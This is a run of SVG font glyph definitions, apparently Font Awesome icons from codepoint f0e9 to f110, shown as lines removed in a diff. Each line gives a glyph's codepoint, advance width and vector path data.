-<glyph unicode="&#xf0e9;" horiz-adv-x="1664" d="M896 708v-580q0 -104 -76 -180t-180 -76t-180 76t-76 180q0 26 19 45t45 19t45 -19t19 -45q0 -50 39 -89t89 -39t89 39t39 89v580q33 11 64 11t64 -11zM1664 681q0 -13 -9.5 -22.5t-22.5 -9.5q-11 0 -23 10q-49 46 -93 69t-102 23q-68 0 -128 -37t-103 -97 q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -28 -17q-18 0 -29 17q-4 6 -14.5 24t-17.5 28q-43 60 -102.5 97t-127.5 37t-127.5 -37t-102.5 -97q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -29 -17q-17 0 -28 17q-4 6 -14.5 24t-17.5 28q-43 60 -103 97t-128 37q-58 0 -102 -23t-93 -69 q-12 -10 -23 -10q-13 0 -22.5 9.5t-9.5 22.5q0 5 1 7q45 183 172.5 319.5t298 204.5t360.5 68q140 0 274.5 -40t246.5 -113.5t194.5 -187t115.5 -251.5q1 -2 1 -7zM896 1408v-98q-42 2 -64 2t-64 -2v98q0 26 19 45t45 19t45 -19t19 -45z" />
-<glyph unicode="&#xf0ea;" horiz-adv-x="1792" d="M768 -128h896v640h-416q-40 0 -68 28t-28 68v416h-384v-1152zM1024 1312v64q0 13 -9.5 22.5t-22.5 9.5h-704q-13 0 -22.5 -9.5t-9.5 -22.5v-64q0 -13 9.5 -22.5t22.5 -9.5h704q13 0 22.5 9.5t9.5 22.5zM1280 640h299l-299 299v-299zM1792 512v-672q0 -40 -28 -68t-68 -28 h-960q-40 0 -68 28t-28 68v160h-544q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1088q40 0 68 -28t28 -68v-328q21 -13 36 -28l408 -408q28 -28 48 -76t20 -88z" />
-<glyph unicode="&#xf0eb;" horiz-adv-x="1024" d="M736 960q0 -13 -9.5 -22.5t-22.5 -9.5t-22.5 9.5t-9.5 22.5q0 46 -54 71t-106 25q-13 0 -22.5 9.5t-9.5 22.5t9.5 22.5t22.5 9.5q50 0 99.5 -16t87 -54t37.5 -90zM896 960q0 72 -34.5 134t-90 101.5t-123 62t-136.5 22.5t-136.5 -22.5t-123 -62t-90 -101.5t-34.5 -134 q0 -101 68 -180q10 -11 30.5 -33t30.5 -33q128 -153 141 -298h228q13 145 141 298q10 11 30.5 33t30.5 33q68 79 68 180zM1024 960q0 -155 -103 -268q-45 -49 -74.5 -87t-59.5 -95.5t-34 -107.5q47 -28 47 -82q0 -37 -25 -64q25 -27 25 -64q0 -52 -45 -81q13 -23 13 -47 q0 -46 -31.5 -71t-77.5 -25q-20 -44 -60 -70t-87 -26t-87 26t-60 70q-46 0 -77.5 25t-31.5 71q0 24 13 47q-45 29 -45 81q0 37 25 64q-25 27 -25 64q0 54 47 82q-4 50 -34 107.5t-59.5 95.5t-74.5 87q-103 113 -103 268q0 99 44.5 184.5t117 142t164 89t186.5 32.5 t186.5 -32.5t164 -89t117 -142t44.5 -184.5z" />
-<glyph unicode="&#xf0ec;" horiz-adv-x="1792" d="M1792 352v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5q-12 0 -24 10l-319 320q-9 9 -9 22q0 14 9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h1376q13 0 22.5 -9.5t9.5 -22.5zM1792 896q0 -14 -9 -23l-320 -320q-9 -9 -23 -9 q-13 0 -22.5 9.5t-9.5 22.5v192h-1376q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1376v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
-<glyph unicode="&#xf0ed;" horiz-adv-x="1920" d="M1280 608q0 14 -9 23t-23 9h-224v352q0 13 -9.5 22.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-352h-224q-13 0 -22.5 -9.5t-9.5 -22.5q0 -14 9 -23l352 -352q9 -9 23 -9t23 9l351 351q10 12 10 24zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088 q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
-<glyph unicode="&#xf0ee;" horiz-adv-x="1920" d="M1280 672q0 14 -9 23l-352 352q-9 9 -23 9t-23 -9l-351 -351q-10 -12 -10 -24q0 -14 9 -23t23 -9h224v-352q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5v352h224q13 0 22.5 9.5t9.5 22.5zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088 q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
-<glyph unicode="&#xf0f0;" horiz-adv-x="1408" d="M384 192q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45zM1408 131q0 -121 -73 -190t-194 -69h-874q-121 0 -194 69t-73 190q0 68 5.5 131t24 138t47.5 132.5t81 103t120 60.5q-22 -52 -22 -120v-203q-58 -20 -93 -70t-35 -111q0 -80 56 -136t136 -56 t136 56t56 136q0 61 -35.5 111t-92.5 70v203q0 62 25 93q132 -104 295 -104t295 104q25 -31 25 -93v-64q-106 0 -181 -75t-75 -181v-89q-32 -29 -32 -71q0 -40 28 -68t68 -28t68 28t28 68q0 42 -32 71v89q0 52 38 90t90 38t90 -38t38 -90v-89q-32 -29 -32 -71q0 -40 28 -68 t68 -28t68 28t28 68q0 42 -32 71v89q0 68 -34.5 127.5t-93.5 93.5q0 10 0.5 42.5t0 48t-2.5 41.5t-7 47t-13 40q68 -15 120 -60.5t81 -103t47.5 -132.5t24 -138t5.5 -131zM1088 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5 t271.5 -112.5t112.5 -271.5z" />
-<glyph unicode="&#xf0f1;" horiz-adv-x="1408" d="M1280 832q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 832q0 -62 -35.5 -111t-92.5 -70v-395q0 -159 -131.5 -271.5t-316.5 -112.5t-316.5 112.5t-131.5 271.5v132q-164 20 -274 128t-110 252v512q0 26 19 45t45 19q6 0 16 -2q17 30 47 48 t65 18q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5q-33 0 -64 18v-402q0 -106 94 -181t226 -75t226 75t94 181v402q-31 -18 -64 -18q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5q35 0 65 -18t47 -48q10 2 16 2q26 0 45 -19t19 -45v-512q0 -144 -110 -252 t-274 -128v-132q0 -106 94 -181t226 -75t226 75t94 181v395q-57 21 -92.5 70t-35.5 111q0 80 56 136t136 56t136 -56t56 -136z" />
-<glyph unicode="&#xf0f2;" horiz-adv-x="1792" d="M640 1152h512v128h-512v-128zM288 1152v-1280h-64q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h64zM1408 1152v-1280h-1024v1280h128v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h128zM1792 928v-832q0 -92 -66 -158t-158 -66h-64v1280h64q92 0 158 -66 t66 -158z" />
-<glyph unicode="&#xf0f3;" horiz-adv-x="1664" d="M848 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM1664 128q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q190 161 287 397.5t97 498.5 q0 165 96 262t264 117q-8 18 -8 37q0 40 28 68t68 28t68 -28t28 -68q0 -19 -8 -37q168 -20 264 -117t96 -262q0 -262 97 -498.5t287 -397.5z" />
-<glyph unicode="&#xf0f4;" horiz-adv-x="1920" d="M1664 896q0 80 -56 136t-136 56h-64v-384h64q80 0 136 56t56 136zM0 128h1792q0 -106 -75 -181t-181 -75h-1280q-106 0 -181 75t-75 181zM1856 896q0 -159 -112.5 -271.5t-271.5 -112.5h-64v-32q0 -92 -66 -158t-158 -66h-704q-92 0 -158 66t-66 158v736q0 26 19 45 t45 19h1152q159 0 271.5 -112.5t112.5 -271.5z" />
-<glyph unicode="&#xf0f5;" horiz-adv-x="1408" d="M640 1472v-640q0 -61 -35.5 -111t-92.5 -70v-779q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v779q-57 20 -92.5 70t-35.5 111v640q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45 t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45zM1408 1472v-1600q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v512h-224q-13 0 -22.5 9.5t-9.5 22.5v800q0 132 94 226t226 94h256q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0f6;" horiz-adv-x="1280" d="M1024 352v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704q14 0 23 -9t9 -23zM1024 608v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704q14 0 23 -9t9 -23zM128 0h1024v768h-416q-40 0 -68 28t-28 68v416h-512v-1280z M768 896h376q-10 29 -22 41l-313 313q-12 12 -41 22v-376zM1280 864v-896q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h640q40 0 88 -20t76 -48l312 -312q28 -28 48 -76t20 -88z" />
-<glyph unicode="&#xf0f7;" horiz-adv-x="1408" d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 -128h384v1536h-1152v-1536h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM1408 1472v-1664q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h1280q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0f8;" horiz-adv-x="1408" d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 -128h384v1152h-256v-32q0 -40 -28 -68t-68 -28h-448q-40 0 -68 28t-28 68v32h-256v-1152h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM896 1056v320q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-96h-128v96q0 13 -9.5 22.5 t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5v96h128v-96q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1408 1088v-1280q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1280q0 26 19 45t45 19h320 v288q0 40 28 68t68 28h448q40 0 68 -28t28 -68v-288h320q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0f9;" horiz-adv-x="1920" d="M640 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM256 640h384v256h-158q-14 -2 -22 -9l-195 -195q-7 -12 -9 -22v-30zM1536 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5 t90.5 37.5t37.5 90.5zM1664 800v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM1920 1344v-1152 q0 -26 -19 -45t-45 -19h-192q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-128q-26 0 -45 19t-19 45t19 45t45 19v416q0 26 13 58t32 51l198 198q19 19 51 32t58 13h160v320q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0fa;" horiz-adv-x="1792" d="M1280 416v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM640 1152h512v128h-512v-128zM256 1152v-1280h-32 q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h32zM1440 1152v-1280h-1088v1280h160v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h160zM1792 928v-832q0 -92 -66 -158t-158 -66h-32v1280h32q92 0 158 -66t66 -158z" />
-<glyph unicode="&#xf0fb;" horiz-adv-x="1920" d="M1920 576q-1 -32 -288 -96l-352 -32l-224 -64h-64l-293 -352h69q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-96h-160h-64v32h64v416h-160l-192 -224h-96l-32 32v192h32v32h128v8l-192 24v128l192 24v8h-128v32h-32v192l32 32h96l192 -224h160v416h-64v32h64h160h96 q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-69l293 -352h64l224 -64l352 -32q261 -58 287 -93z" />
-<glyph unicode="&#xf0fc;" horiz-adv-x="1664" d="M640 640v384h-256v-256q0 -53 37.5 -90.5t90.5 -37.5h128zM1664 192v-192h-1152v192l128 192h-128q-159 0 -271.5 112.5t-112.5 271.5v320l-64 64l32 128h480l32 128h960l32 -192l-64 -32v-800z" />
-<glyph unicode="&#xf0fd;" d="M1280 192v896q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-512v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-896q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h512v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf0fe;" d="M1280 576v128q0 26 -19 45t-45 19h-320v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-320q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h320v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h320q26 0 45 19t19 45zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf100;" horiz-adv-x="1024" d="M627 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23zM1011 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23 t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23z" />
-<glyph unicode="&#xf101;" horiz-adv-x="1024" d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM979 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23 l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
-<glyph unicode="&#xf102;" horiz-adv-x="1152" d="M1075 224q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM1075 608q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393 q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
-<glyph unicode="&#xf103;" horiz-adv-x="1152" d="M1075 672q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23zM1075 1056q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23 t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
-<glyph unicode="&#xf104;" horiz-adv-x="640" d="M627 992q0 -13 -10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
-<glyph unicode="&#xf105;" horiz-adv-x="640" d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
-<glyph unicode="&#xf106;" horiz-adv-x="1152" d="M1075 352q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
-<glyph unicode="&#xf107;" horiz-adv-x="1152" d="M1075 800q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
-<glyph unicode="&#xf108;" horiz-adv-x="1920" d="M1792 544v832q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5zM1920 1376v-1088q0 -66 -47 -113t-113 -47h-544q0 -37 16 -77.5t32 -71t16 -43.5q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19 t-19 45q0 14 16 44t32 70t16 78h-544q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf109;" horiz-adv-x="1920" d="M416 256q-66 0 -113 47t-47 113v704q0 66 47 113t113 47h1088q66 0 113 -47t47 -113v-704q0 -66 -47 -113t-113 -47h-1088zM384 1120v-704q0 -13 9.5 -22.5t22.5 -9.5h1088q13 0 22.5 9.5t9.5 22.5v704q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5z M1760 192h160v-96q0 -40 -47 -68t-113 -28h-1600q-66 0 -113 28t-47 68v96h160h1600zM1040 96q16 0 16 16t-16 16h-160q-16 0 -16 -16t16 -16h160z" />
-<glyph unicode="&#xf10a;" horiz-adv-x="1152" d="M640 128q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1024 288v960q0 13 -9.5 22.5t-22.5 9.5h-832q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h832q13 0 22.5 9.5t9.5 22.5zM1152 1248v-1088q0 -66 -47 -113t-113 -47h-832 q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h832q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf10b;" horiz-adv-x="768" d="M464 128q0 33 -23.5 56.5t-56.5 23.5t-56.5 -23.5t-23.5 -56.5t23.5 -56.5t56.5 -23.5t56.5 23.5t23.5 56.5zM672 288v704q0 13 -9.5 22.5t-22.5 9.5h-512q-13 0 -22.5 -9.5t-9.5 -22.5v-704q0 -13 9.5 -22.5t22.5 -9.5h512q13 0 22.5 9.5t9.5 22.5zM480 1136 q0 16 -16 16h-160q-16 0 -16 -16t16 -16h160q16 0 16 16zM768 1152v-1024q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v1024q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
-<glyph unicode="&#xf10c;" d="M768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103 t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf10d;" horiz-adv-x="1664" d="M768 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z M1664 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z" />
-<glyph unicode="&#xf10e;" horiz-adv-x="1664" d="M768 1216v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136zM1664 1216 v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136z" />
-<glyph unicode="&#xf110;" horiz-adv-x="1568" d="M496 192q0 -60 -42.5 -102t-101.5 -42q-60 0 -102 42t-42 102t42 102t102 42q59 0 101.5 -42t42.5 -102zM928 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM320 640q0 -66 -47 -113t-113 -47t-113 47t-47 113 t47 113t113 47t113 -47t47 -113zM1360 192q0 -46 -33 -79t-79 -33t-79 33t-33 79t33 79t79 33t79 -33t33 -79zM528 1088q0 -73 -51.5 -124.5t-124.5 -51.5t-124.5 51.5t-51.5 124.5t51.5 124.5t124.5 51.5t124.5 -51.5t51.5 -124.5zM992 1280q0 -80 -56 -136t-136 -56 t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1536 640q0 -40 -28 -68t-68 -28t-68 28t-28 68t28 68t68 28t68 -28t28 -68zM1328 1088q0 -33 -23.5 -56.5t-56.5 -23.5t-56.5 23.5t-23.5 56.5t23.5 56.5t56.5 23.5t56.5 -23.5t23.5 -56.5z" />
